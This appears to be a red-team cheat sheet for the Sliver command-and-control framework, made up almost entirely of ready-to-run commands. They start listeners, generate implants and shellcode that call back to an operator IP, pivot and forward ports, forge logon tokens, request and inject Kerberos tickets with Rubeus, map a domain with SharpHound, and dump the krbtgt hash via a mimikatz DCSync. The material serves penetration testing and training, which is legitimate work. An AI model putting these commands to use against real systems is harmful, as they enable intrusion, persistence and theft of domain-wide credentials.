Sliver

Start a Listener

mtls -L IP -l PORT

Generate a Payload

generate --mtls IP:PORT --os linux/windows --save OUTFILE

Generate without Shikata ga nai (no rwx needed)

generate --tcp-pivot/--mtls IP:PORT --os windows -e -G -f shellcode --save out.bin

Start a Pivot Listener

pivots tcp --bind IP -l PORT

Remove Pivots / Jobs

jobs
jobs -k ID

PortForward

portfwd add -b 127.0.0.1:8080 -r IP:PORT

Remove PortFwd

# list
portfwd

# remove
portfwd rm -i ID

Make Token

make-token -u USER -d DOMAIN -p PASSWORD --logon-type LOGON_NETWORK_CLEARTEXT

Rubeus

rubeus -- asktgt /user:USER /password:PASS /ptt

SharpHound

sharp-hound-4 -t 360 -- -c All -s --recursedomains --outputdirectory 'C:\Windows\Temp'

DCSync

mimikatz -- 'lsadump::dcsync /domain:DOMAIN /user:krbtgt'

Last updated 25 days ago
